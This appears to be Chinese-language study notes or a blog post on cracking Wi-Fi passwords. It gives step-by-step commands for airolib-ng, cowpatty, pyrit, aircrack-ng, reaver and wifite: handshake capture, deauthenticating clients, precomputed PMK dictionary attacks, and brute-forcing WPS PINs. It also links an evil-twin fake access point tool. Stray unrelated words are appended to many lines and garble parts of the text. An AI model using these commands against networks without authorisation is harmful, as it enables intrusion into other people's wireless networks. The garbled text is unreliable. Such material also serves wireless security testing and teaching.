Airolibgit
设计用于存储ESSID和密码列表,计算生成不变的PMK(计算资源消耗型)github
PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)sql
经过完整性摘要值破解密码SQLite3数据库存储数据数据库
实例:npm
抓包获取四步信息安全
echo 目标ESSID > essid.txt(建立一个ESSID文件)
airolib-ng db --import essid essid.txt(建立一个数据库db,导入一个essid,这个essid文件存在essid.txt文件里)
airolib-ng db --stats(查看数据库状态)
airolib-ng db --import passwd /usr/share/wordlists/xxx.txt(导入密码文件,它会剔除不合格的密码)
airolib-ng db --batch(生成PMK)
aircrack-ng -r db test-01.cap(经过抓取到的包对比db数据库里面的PMK破解密码)工具
Cowpatty破解密码 设计
同样的,先抓包获取四步信息3d
cowpatty -r xx-01.cap -f password.txt -s 目标essid (-r 指定抓到包的文件,-f 使用的字典,-s 目标essid)blog
使用彩虹表(PMK)
genpmk -f password.txt -d pmk -s 目标essid (-f 使用的字典 -d生成的pmk文件名 -s 目标essid)
cowpatty -r xx-01.cap -d pmk -s 目标essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目标essid)
Pyrit破解密码
与airolib,cowpatty相同,支持基于预计算的pmk提升破解速度
独有的优点:
CPU外,能够运用GPU的计算能力加速生成PMK,自己支持抓包获取四步握手过程,无需airodump抓包
也支持传统的读取airodump抓包获取四步握手的方式
实例:
pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的网卡,-o 输出文件名 stripLive是踢出多余的信息)
而后配合aireplay-ng把目标打掉,获取四步信息
会生成一个抓包文件
分析包(analyze)
从airodump抓包导入并筛选提取出新的包,剔除多余的信息
会生成新的包
能够直接用密码字典破解,可是没灵魂,使用数据库模式破解
默认基于文件的数据库,支持sql数据库,将计算的PMK存入数据库
查看默认数据库状态:pyrit eval
导入密码字典:pyrit -i password.txt import_passwords(会剔除不合格的密码)
指定ESSID:pyrit -e ESSID名 create_essid (建立essid)
计算PMK:pyrit batch (发挥GPU计算能力)
破解密码:pyrit -r wap01.cap -b APmac attack_db
实例:
导入密码文件
查看可用密码文件
建立essid
计算PMK
破解密码
WPS攻击
WPS是wifi联盟2006年开发的一项技术,经过pin码来简化无线接入的操做,无需记住PSK,路由器和网卡名各按一个按钮就能接入无线.pin码是分为先后各4位的2段共8位数字
2011年被发现安全漏洞,接入发起方能够根据路由器的返回信息判断前4位是否正确,而pin码的后四位只有1000种定义的组合(最后一位是checksum),因此所有穷举破解只须要11000次尝试,(PSK 218,340,105,584,896),标准自己没有设定锁定机制,目前多个厂商已实现锁定机制
wash -i wlan0mon (发现支持wps的无线)
airodump-ng wlan0mon --wps (也能够加上--wps参数)
爆破PIN码
reaver -i wlan0mon -b APmac -vv
爆破出pin码后
reaver -i wlan0mon -b APmac -vv -p PIN码
综合自动化无线密码破解工具:wifite
ctrl+c中止扫描,选择目标
它会自动逐个尝试,WPS,握手包等等
伪造AP:3vilTwinAttacker https://github.com/wi-fi-analyzer/3vilTwinAttacker.git
友情连接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn